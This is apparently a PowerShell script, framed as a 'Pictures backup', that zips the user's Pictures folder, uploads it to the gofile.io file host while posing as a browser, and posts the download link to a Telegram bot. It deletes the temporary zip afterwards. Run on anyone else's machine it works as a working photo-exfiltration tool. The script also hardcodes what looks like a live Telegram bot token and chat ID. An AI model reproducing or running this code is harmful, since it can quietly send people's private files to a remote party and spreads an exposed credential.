# ========================================
#          ROBUST CONFIGURATION
# ========================================
# 1. FIX SECURITY PROTOCOLS (Prevents "API Down" errors)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# 2. YOUR DETAILS
$BotToken       = "8160534358:AAGKwhDjIS1xGFUCSBD7zU2pBH-YnfvKV_w"
$ChatId         = "2146236602"

# 3. PATHS
$PicturesFolder = "$env:USERPROFILE\Pictures" 
$ZipFile        = "$env:TEMP\Pictures_Backup.zip"

# Function to pause window so it doesn't vanish on error
function Pause-Script {
    Write-Host "`nPress Enter to exit..." -ForegroundColor Gray
    $null = Read-Host
    exit
}
# ========================================

Clear-Host
Write-Host "--- STARTED ROBUST BACKUP PROCESS ---" -ForegroundColor Magenta

# ---------------------------------------------------------
# STEP 1: ZIP THE FOLDER
# ---------------------------------------------------------
Write-Host "[1/4] Zipping pictures folder..." -ForegroundColor Cyan
try {
    if (Test-Path $ZipFile) { Remove-Item $ZipFile -Force }
    
    # Check if source folder actually exists
    if (-not (Test-Path $PicturesFolder)) {
        throw "Source folder not found: $PicturesFolder"
    }

    Compress-Archive -Path "$PicturesFolder\*" -DestinationPath $ZipFile -Force -ErrorAction Stop
    Write-Host "      Zip created successfully." -ForegroundColor Green
}
catch {
    Write-Host "[-] ZIP ERROR: $($_.Exception.Message)" -ForegroundColor Red
    Pause-Script
}

# ---------------------------------------------------------
# STEP 2: GET GOFILE SERVER
# ---------------------------------------------------------
Write-Host "[2/4] Finding best upload server..." -ForegroundColor Cyan
try {
    # Added UserAgent to look like a real browser
    $serverInfo = Invoke-RestMethod -Uri "https://api.gofile.io/getServer" -UserAgent "Mozilla/5.0" -ErrorAction Stop
    $server = $serverInfo.data.server
    
    if ([string]::IsNullOrWhiteSpace($server)) { throw "Server API returned empty data" }
    Write-Host "      Connected to server: $server" -ForegroundColor Gray
}
catch {
    Write-Host "[-] SERVER ERROR: $($_.Exception.Message)" -ForegroundColor Red
    Write-Host "    (This usually means Gofile is blocking requests or internet is unstable)" -ForegroundColor Gray
    Pause-Script
}

# ---------------------------------------------------------
# STEP 3: UPLOAD FILE
# ---------------------------------------------------------
Write-Host "[3/4] Uploading file (Please wait)..." -ForegroundColor Cyan

# Check for Curl
if (-not (Test-Path "$env:SystemRoot\System32\curl.exe")) {
    Write-Host "[-] Curl.exe is missing. This script requires Windows 10 or 11." -ForegroundColor Red
    Pause-Script
}

# Run Upload
$uploadUrl = "https://$server.gofile.io/uploadFile"
$curlOutput = & "$env:SystemRoot\System32\curl.exe" -s -F "file=@$ZipFile" $uploadUrl

try {
    # Robust JSON parsing
    $result = $curlOutput -join "`n" | ConvertFrom-Json
    
    if ($result.status -ne "ok") { 
        throw "Upload status: $($result.status)" 
    }
    
    $DownloadLink = $result.data.downloadPage
    Write-Host "      Upload Successful!" -ForegroundColor Green
    Write-Host "      Link: $DownloadLink" -ForegroundColor Yellow
}
catch {
    Write-Host "[-] UPLOAD FAILED." -ForegroundColor Red
    Write-Host "    Raw Response: $curlOutput" -ForegroundColor Gray
    Pause-Script
}

# ---------------------------------------------------------
# STEP 4: SEND TO TELEGRAM & CLEANUP
# ---------------------------------------------------------
Write-Host "[4/4] Sending to Telegram..." -ForegroundColor Cyan
try {
    $msgText = "📸 *Pictures Backup Complete*`n`nLink: $DownloadLink"
    
    Invoke-RestMethod -Uri "https://api.telegram.org/bot$BotToken/sendMessage" `
        -Method Post `
        -Body @{
            chat_id    = $ChatId
            text       = $msgText
            parse_mode = "Markdown"
        } -ErrorAction Stop
        
    Write-Host "      Message sent!" -ForegroundColor Green

    # --- CLEANUP (Only happens if everything above worked) ---
    Write-Host "      Cleaning up temporary files..." -NoNewline
    Remove-Item $ZipFile -Force -ErrorAction SilentlyContinue
    Write-Host "Done." -ForegroundColor Green
}
catch {
    Write-Host "[-] TELEGRAM ERROR: $($_.Exception.Message)" -ForegroundColor Red
    # We do NOT delete the file if Telegram fails, so you don't lose the backup
    Pause-Script
}

Write-Host "`n[✓] OPERATION COMPLETED SUCCESSFULLY." -ForegroundColor Green
Write-Host "Press Enter to close..."
$null = Read-Host
